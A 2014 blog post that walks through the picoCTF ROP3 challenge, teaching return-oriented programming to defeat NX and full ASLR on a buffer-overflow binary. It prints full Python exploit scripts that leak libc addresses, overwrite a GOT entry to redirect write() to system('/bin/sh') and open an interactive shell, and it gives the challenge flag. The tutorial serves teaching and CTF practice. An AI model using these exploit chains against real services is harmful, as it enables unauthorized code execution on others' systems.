Sunday, November 16, 2014

Anatomy of an ROP Attack: Case Study

In this article, we will learn the fundamentals of Return Oriented Programming (ROP) while dissecting a picoCTF problem regarding ROP. This will serve primarily as a primer/introduction to ROP, while the next article (ROP4 Writeup) will be a continued application of ROP to yet another problem. So let's begin by examining what is ROP, and why are we even using it?




**Disclaimer: If memory serves me right, when this challenge was live in 2013, ASLR was not on full randomization mode. It was later, several months after the competition finished, that ASLR was set to "2" (full randomization). This made the challenge more difficult to solve and in this article I will discuss how to solve it even with "2" ASLR. For solutions on how to solve it given slightly more conservative ASLR settings ( as was the case in the actual competition) several write-ups are available online. **


Analyzing the source code


The ROP3 challenge from the picoCTF website offers us this rop3.c source code file:


#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function()  {
        char buf[128];
        read(STDIN_FILENO, buf,256);
}

void be_nice_to_people() {
        // /bin/sh is usually symlinked to bash, which usually drops privs. Make
        // sure we don't drop privs if we exec bash, (ie if we call system()).
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
        be_nice_to_people();
        vulnerable_function();
        write(STDOUT_FILENO, "Hello, World\n", 13);
}
Pretty standard stuff, except for the dead giveaway vulnerable_function. There is a clear,textbook buffer overflow vulnerability there as more bytes are being read into the buffer than was designated. This can be exploited!  The function tries to read 256 bytes into a 128 byte buffer which opens huge security holes that can be taken advantage of. To facilitate our exploitation, I'll be running this as a network service using netcat. On the picoCTF servers, nc-e doesn't work since it is a different distribution of netcat, but a workaround can be done.






That simple bash while loop provides the same functionality as would nc -e. By letting this run as a network service, we can just netcat ourselves on port 1234 and interact with an instance of ./rop3. This also allows us to send/receive data from a running instance of ./rop3 which, as we'll see, is crucial for this ROP exploit to work since a data leak in necessary (as ASLR is on full randomization).

Exploitation checklist

The first thing we can possibly check is to see if the stack is executable. Should this be the case, the exploit is a trivial NOP sled + shellcode technique. As you can probably infer by the title of this article, the stack is nonexecutable, but let's verify.



In this snippet from my terminal, I download a useful utility known as checksec, which allows you to analyze certain security components of a given binary. I give myself execution permission on the binary and run it with the rop3 program on the picoCTF servers. As we can see in the picture, "NX enabled" tells us that the stack in nonexecutable. However, there are no stack canaries, so dealing with the infamous stack smashing protection can be forgotten about!

Next on the checklist for possible exploits is ret2libc. Perhaps if a libc function like system() or execlp() can be located precisely, we can bypass NX and overflow EIP to point to system() with an argument of "/bin/sh". We don't seem to have any instance of a libc function in our source code that would facilitate our exploit, but lets do a quick debug of our binary and print out the location of system to see if we can possibly use it as an attack vector.


Uh-oh. The address of system() changes in between runs! This means we have ASLR enabled and standard ret2libc isn't going to help us out here. We can't have ret2libc work because the address of system() isn't deterministic without additional information(I'll get to this a bit later). How bad is ASLR in this case? Well, doing a cat /proc/sys/kernel/randomize_va_space gives us the value "2" meaning ,ASLR is on full randomization. ( For more information on the different "levels" of ASLR, read this document). What this implies is that environmental variables are also effected. So even if NX had been disabled, thus allowing an executable stack,  locating our shellcode in an environmental variable would have been harder to do and unpredictable between runs of the program, thanks to ASLR).

So now what? Environmental-variable based attacks won't work due to NX and ASLR, and ret2libc won't work because of ASLR. Here's an idea. What if instead of relying on randomized functions, why don't we reuse some of the parts of the binary that are fixed? Perhaps if we can find bits and pieces within the binary itself that, when crafted together, perform a desired exploit, we can mitigate both NX and ASLR! This is the fundamental idea behind ROP. Reuse code that's already in your binary. That code nor the location of it can be randomized ,thus bypassing ASLR, and because we never try to execute stack-memory, NX isn't an issue.  Additionally, constructing ROP exploits follows a standard stack model with regards to function calls (the return address proceeding the actual function, and arguments thereafter). ROP is like a lesson in recycling bits of your code to form exploits =)


Stackframes 101

Before delving deeper into this specific instance of an ROP-based exploit, lets examine a sample portion of the stack where a function call is made. This will be the basis for understanding ROP exploits.


So here we have the function strcpy() that will copy STRING_2 into STRING_1 and will return to RET-ADDR when finished. Notice how the return address for a function call comes in between the address of the function at hand (in this case strcpy) and the first argument. The structure of this should also be strikingly similar to you if you've done binary exploitation in the past. This is also a standard ret2libc exploit! EIP will be overwritten to point to a function of choice, followed by a return address (which in many ret2libc exploits is either 0xAAAAAAAA or the address of exit() ), and the arguments follow along. This same sort of exploit can be done with the components within your binary. Only, you're not returning to libc. But being limited to what is available within our binary isn't very helpful. Unless there's a plain old call to system("/bin/sh"), this technique isn't helping us! Which leads us to the discussion of having "chained" (or multiple) of these functions.

Imagine if when stepping through your binary you find the location for the string "/bin" and the location of another string containing "/sh". You've also found the location of an unused segment of memory that can contain these characters. And luckily for you, you can also find out the address of a function such as strcpy(). The elements for spelling out an attack are right at your premise! Logically, if we can strcpy(unused_memory,"/bin"); strcpy(unused_memory+4,"/sh"); we now have a location in memory containing the string "/bin/sh", all that's left is to find out a way to execute it! But wait a minute, I need to make 2 function calls on different sets of arguments. How in the world can I construct a stack that looks like this? Great question! The answer to this is also one of the most fundamental pieces to ROP. Let's explore.

ROP baby steps


Referring back to our previous image of a stack frame for the strcpy function, its easy to see that if we can manipulate/control the return address and perhaps make it return again to strcpy using a different set of arguments, our master plan would work. The only problem is, if we just make the RET-ADDR = &strcpy, nothing would really be accomplished. After the initial strcpy is done, we return again to strcpy, but this time, the return address would be STRING_1 (clearly invalid) and would try to copy into STRING_2 the value of whatever is above STRING_2 on the stack. Perhaps a picture would clear up some confusion.

Here is what the stack would look like if RET-ADDR would equal &strcpy:


The blue signifies the return address. So the red strcpy has no problems executing : it copies STRING_2 into STRING_1 and returns into blue STRCPY. The problems start unraveling as soon as the blue STRCPY makes it stack frame. To the blue STRCPY, its stack-frame looks like this:











The problem here is that the blue strcpy is rather useless. On top of useless, it will just simply crash the program, since (the original) STRING_1 is not a valid return address.  So how can we chain these function calls such that the red strcpy can execute properly and the blue strcpy can execute properly with its own arguments and return values? If there is hope... it lies in the proles, gadgets.

Instead of returning directly into another function call, it seems as if it would make more sense if we can somehow get  rid of  the 2 arguments and then spell out the stack frame for the next call to strcpy. What I mean by this is if RET-ADDR (for the red strcpy) can somehow pop STRING_1 and STRING_2 off the stack,  then call (blue) strcpy with the appropriate arguments we'd be in business. This operation in ROP terminology is known as a a gadget. And good news too, even small binaries like the one we're dealing with for the ROP3 picoCTF challenge are usually quite rich with gadgets! In essence, a gadget is a series of x86 (or equivalent in other architectures) pop instructions followed by a ret instruction. pop does exactly as it sounds, it pops the next item off the stack. More specifically, it advances ESP by 4 bytes, thus effectively getting "rid" of the arguments. So if we can find in our binary, the location of a sequence of 2 pops followed by a ret we'd be talking! The 2 pops would advance ESP past STRING_1 and STRING_2. The ret would call whatever function happens to be in memory above STRING_2. So now, if we draw out our stack as follows:




We can have 2 strcpy calls! Upon further inspection, the red strcpy simply copies STRING_2 into STRING_1 and once its finished, returns into a pop/pop/ret sequence. This makes the ESP jump over STRING_1, jump over STRING_2, and return into the next available 4 byte sequence in memory, which happens to be the blue strcpy! Now, a stackframe is rebuilt for the blue strcpy, following the same rules as the red one. This time we will copy STRING_4 into STRING_3 and return into RET-ADDR-2, whatever it may be. Perhaps it can even be another pop/pop/ret sequence to allow us to call yet another function.

The purpose of all of this is to allow us to chain together sequences of function calls with their appropriate arguments to make exploiting that much more powerful. Since we can find the locations of these pop/pop/ret sequences within our binary itself, we can rest assured they won't be randomized, and the addresses of functions such as strcpy can be determined given an information leak, ASLR is contemplating suicide =)


Plan of attack


Now that we know how to construct these stackframes for multiple function calls, lets build a plan of attack.

  1. No matter what, we need to somehow determine the location of system() at runtime so that grabbing a shell can even be possible. This can be done with an information leak and calculating offsets (I'll cover how to do this).
  2. The string "/bin/sh" needs to be placed somewhere in memory so that we can actually call system() with the correct argument to grab a shell. This can be done with read() calls.
  3. A call to system() must be forced. Because the address of system() will be calculated at runtime, we can't magically force EIP to point to system. Instead, we need to trick EIP into pointing to a function that was "spoofed" to be system(). This is perhaps the most obscure and initially tricky to grasp part of ROP, but once we see how its done, it will all make sense.

Attack Phase 1


Obviously ASLR is something we will need to bypass effectively to land our exploit. Due to the randomization of certain libc functions such as system(), we need an information leak to calculate where it will be during runtime. Lucky for us, even though the address of system() may change from run to run, its offset (meaning the difference/"distance" between it and another function)  will remain the same, regardless of ASLR. This is good news! This means that if we calculate the offset between system() and write() to be 0xdeadbeef (for example) and then we can leak information about where write() currently resides in memory, we can add (or subtract) 0xdeadbeef from it to obtain the address of system! This, however, requires us to know the location of at least 1 function call prior to runtime. Using objdump  and looking at the PLT (procedure linkage table), we can grab this information easily. Let's see some output:





An objdump -R tells us that both read() and write() are in the GOT at finite locations! Jackpot! Searching a bit deeper reveals to us that read() and write() are implemented as jmps in the PLT. So where's the randomization here? Everything seems to be finite. The randomization takes place at the actual locations where we would jmp whenever we call read() or write(). The specific location in the PLT where read() and write() reside as well as where they jump are concrete, but where each jmp location points to is random. Notice the asterisk next to the red-boxed jmp instructions. Looks like pointer syntax doesn't it? It can be thought of in that way, the pointer locations are concretely known, but where they point is the magic of ASLR.

Since offsets are consistent, we can calculate the offsets between system() and write() by subtracting where they reside. Let's do this now.





The addresses of system() and write() are printed from a debug session. (As a side note, notice how the address of write is 0xf76caae0. This same value is stored within the "pointer" that write() jumps to in the PLT). We take the difference between the two to be 657552, or equivalently 0xA0890 in hex. To prove that offsets remain consistent, I'll run a new gdb session, this time subtracting 0xA0890 from the address of write() and we should get the beginning of the instructions for system().



Confirmed! We subtracted the offset we had previously determined (0xa0890) from the current address of write() and got the beginning of system() ( shown in blue). To further prove the case, we examined the instruction where system() currently resides and we get equivalent values ( shown in green).

So to put this into perspective, if we can get the program to ouput (via its socket) the current address of write() back to us, we can subtract the corresponding offset (0xa0890) and grab the address of system.

Implementing this  in python is fairly straightforward.


import socket
import time
from struct import pack,unpack

def get_socket(chal):

        s = socket.socket();

        #s.settimeout(5);

        s.connect(chal);

        return s;





offset = 0xa0890; # calculated by subtracting write and system
write =0x080483a0; # from objdump -D ./rop3 | grep write
write_addr = 0x804a010; #write's .plt entry (a.k.a the "pointer")
chal = ('127.0.0.1',1234);  # make a connection to our netcat session

overflow = "A" * 140; # After 140 bytes, the 0x41 bytes start to overflow into EIP
payload = pack("<IIIII",write,0xdeadbeef,1,write_addr,4);
rop = overflow + payload;

s = get_socket(chal);
s.send(rop);
current_write = s.recv(4);
current_write = unpack("<I",current_write[0:4])[0];

print "write = ", hex(current_write);
print "system = " ,hex(current_write - offset);

This simple script simply opens up a socket connection to our netcat service and uses the python pack module to write the payload. The payload part sets up a simple stack frame where write is called with arguments 1 (meaning stdout), the value of the "pointer" in the PLT for write(), and 4 bytes (since a 32 bit address is 4 bytes). The return value is just an arbitrary 0xdeadbeef (but we'll be getting those pop/pop/pop/ret gadgets in pretty soon!).  Running this we get the following output:



Great! We can get the address of system now!

Exploit phase 2


Now we must load the value "/bin/sh" into memory so that system() can actually be called on an argument that matters! So we're going to need to find a buffer that can hold "/bin/sh". A good place to start is the .data segment.




We've found an 8-byte location in memory that is not READONLY (and thus we can write to it!). The address is 0x0804a018. To store "/bin/sh" to it, we can instruct the rop3 program to initiate a call to read() through stdin ( which will equate to reading from the socket). The reason we choose read() is because, like write(), we know its exact location in the PLT at all times, so its much easier to call read() than say, strcpy() ( which would have to be calculated using the offset method, as shown above). 

In the following script we will again exploit the rop3 program to read the string "/bin/sh" into the empty buffer we found, as well as  printing it back out so we can confirm that the read() did in fact take place correctly. This is going to require us to call 2 functions. See where this is going? We need a gadget! But not just a pop/pop/ret gadget, we'll need a pop/pop/pop/ret (triple pop, ret) gadget to skip over the file descriptor, the buffer, and the number of bytes (all 3 arguments required for read() ). As a side note, I've already determined the location of a pop/pop/pop/ret gadget within the binary, which is very easy to find using objdump -d rop3 and grep'ing for -A3 pop. Additionally, several tools exist (such as ropeme) that find ROP gadgets in your binaries.


import socket
import time

from struct import pack,unpack

def get_socket(chal):

        s = socket.socket();

        #s.settimeout(5);

        s.connect(chal);

        return s;


pppr = 0x0804855d; # pop/pop/pop/ret gadget
read = 0x08048360; # from objdump -D ./rop3 | grep read
offset = 0xa0890; # calculated by subtracting write and system
write =0x080483a0; # from objdump -D ./rop3 | grep write
write_addr = 0x804a010; #write's .plt entry (a.k.a the "pointer")
buff = 0x0804a018; # from objdump -x rop3 


chal = ('127.0.0.1',1234);  # make a connection to our netcat session

overflow = "A" * 140; # After 140 bytes, the 0x41 bytes start to overflow into EIP
payload = pack("<IIIIIIIIII",read,pppr,0,buff,7,write,0xdeadbeef,1,buff,7);

rop = overflow + payload;

s = get_socket(chal);
s.send(rop);


s.send("/bin/sh"); # will be expecting this by the blocking call to read()

print("buff = " + s.recv(7));



Great! This program produces the following output:




Success! We are successfully writing "/bin/sh" to the .data segment buffer!

Exploit phase 3


Whew! The first 2 items on the plan of attack are taken care of, now lets attack the 3rd. 

As we've seen with the 2 sample ROP-based programs from above, the actual ROP payload is fixed, the only thing we can do is send and receive information from the socket to guide us along the ROP payload. But other than that, we cannot modify our ROP payload at runtime. This is why we need to somehow force( or, as we'll see, trick) the EIP into executing system() when it really thinks its running something else.

Let's take a look at the source code once more to see where we can pull off the trickery.
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function()  {
        char buf[128];
        read(STDIN_FILENO, buf,256);
}

void be_nice_to_people() {
        // /bin/sh is usually symlinked to bash, which usually drops privs. Make
        // sure we don't drop privs if we exec bash, (ie if we call system()).
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
}

int main(int argc, char** argv) {
        be_nice_to_people();
        vulnerable_function();
        write(STDOUT_FILENO, "Hello, World\n", 13);
}
There's a suspicious write(STDOUT_FILENO,"Hello, World\n",13); just after the call to vulnerable_function(). If there's but one lesson you must take out of all the blog posts or writeups you ever read about CTF challenges,  its that every line counts. That write() was put in there for a reason, and we shouldn't just ignore it. As a matter of fact, that innocent looking call to write() will actually be part of the reason why this exploit works and why we can get shell access on this vulnerable program. Let's see why.

In the same way that we can call read() in an attempt to store the string "/bin/sh" into an empty buffer, we can technically call read() to store any sequence of bytes into any location we wish. This is more powerful than it may seem at first.  Remember when we spoke about the PLT and how write() was implemented as a jmp to another memory address? Well, what is stopping us from storing the address of system() , which we've calculated from offsets, into the memory pointed to by that jmp instruction pointer? Nothing. The ramifications of that would be that the next time write() is called, the jmp will not take us to the instructions for write(), but rather to the instructions for system(). It's as if when we call write(), we're instead calling system(). This is how we trick EIP into loading system() for us.

Tying it all together, we must get the address of system(), load "/bin/sh" into the .data segment buffer, and overwrite whatever is at the jmp instruction pointer to instead point to system. After this, we can pop/pop/pop/ret into write (which will actually execute system() ! ) with a return address of 0xdeadbeef, and argument of the data segment buffer (which would at that point contain "/bin/sh").

Here's the program:


import socket
import time

from struct import pack,unpack

def get_socket(chal):

        s = socket.socket();

        #s.settimeout(5);

        s.connect(chal);

        return s;


#notice this new shell() function which allows us to interact with the shell
def shell(sock):

 command = '';
 while(command != 'exit'):
    command = raw_input('$ ');
    sock.send(command + '\n');
    time.sleep(.2);
    print sock.recv(0x10000);
 return;

pppr = 0x0804855d; # pop/pop/pop/ret gadget
read = 0x08048360; # from objdump -D ./rop3 | grep read
offset = 0xa0890; # calculated by subtracting write and system
write =0x080483a0; # from objdump -D ./rop3 | grep write
write_addr = 0x804a010; #write's .plt entry (a.k.a the "pointer")
buff = 0x0804a018; # from objdump -x rop3 


chal = ('127.0.0.1',1234);  # make a connection to our netcat session

overflow = "A" * 140; # After 140 bytes, the 0x41 bytes start to overflow into EIP

payload = pack("<IIIII",write,pppr,1,write_addr,4); # give us the current write() address


payload += pack("<IIIII",read,pppr,0,buff,7); # read "/bin/sh" into buff


payload += pack("<IIIII",read,pppr,0,write_addr,4); # overwrite the jmp pointer 


payload += pack("<III",write,0xdeadbeef,buff); # call write() with the single buff argument



rop = overflow + payload;

s = get_socket(chal);
s.send(rop);


current_write = s.recv(4);
current_write = unpack("<I",current_write[0:4])[0];

#do some debugging =)
print "write = ", hex(current_write);
print "system = " ,hex(current_write - offset);


s.send("/bin/sh"); # store "/bin/sh" into the buffer
s.send(pack("<I",current_write-offset)); # send address of system() to overwrite the PLT

#by now we should have a shell! Let's interact!


shell(s);


Woohoo! Lets see it working!



The code executes the payload, and when an 'ls' is done, we get the files within the directory! But, more importantly, the key is rop_rop_rop_all_the_way_home



Well that was a fun (and randomized) nut to crack! We were able to calculate offsets to determine offsets to find out where system() would be, then stored "/bin/sh" into a location in memory, and finally overwrote the PLT entry for write() so that the next time write() were to be called, we actually pointed to system()!

I hope this was informative and please let me know any comments =)

1 comment: